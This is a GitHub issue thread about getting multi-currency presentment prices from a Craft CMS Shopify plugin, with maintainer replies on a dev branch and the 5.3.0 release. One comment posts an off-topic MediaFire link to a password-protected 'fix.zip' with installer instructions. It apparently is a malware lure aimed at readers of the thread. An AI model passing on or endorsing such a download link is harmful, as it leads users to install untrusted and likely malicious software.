### ISSUE TITLE
Working with multiple currencies

### ISSUE THREAD

**Issue by urgentdotagency** [nmaier95/craft-shopify-product-fetcher#122]
Hi, we are moving a storefront to Craft with this plugin, and the client currently uses multiple currencies and would like to keep this functionality.

As for as I can tell each variant element only returns the price in the default currency. The API has a `presentment_prices` property (and the GQL api a `contextualPricing` property). Is it possible to get this data here? Or is there a recommended method of handling multiple currencies?

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nfourtythree** [comment]
Hi @urgentdotagency 

Thank you for your message and feedback.

We are looking to include presentment prices in all product API requests in the next version of this plugin.

We have pushed the code that will do this to the `5.3` branch.

To try this new version early, change your `craftcms/shopify` requirement in your project's `composer.json` to:

```json
"require": {
  "craftcms/shopify": "5.3.x-dev as 5.2.0",
  "...": "..."
}
```

Then run `composer update`.

If you have a chance to do that, please let us know how you get on.

Thanks!

**Comment by nfourtythree** [comment]
Hi @urgentdotagency 

Shopify 5.3.0 has now been released with this update included.

Thanks!

**Comment by vitalijalbu** [comment]
> Hi [@urgentdotagency](https://github.com/urgentdotagency)
> 
> Shopify 5.3.0 has now been released with this update included.
> 
> Thanks!

Hi, it's possible to work also with translations too? I cannot find anything on docs page.
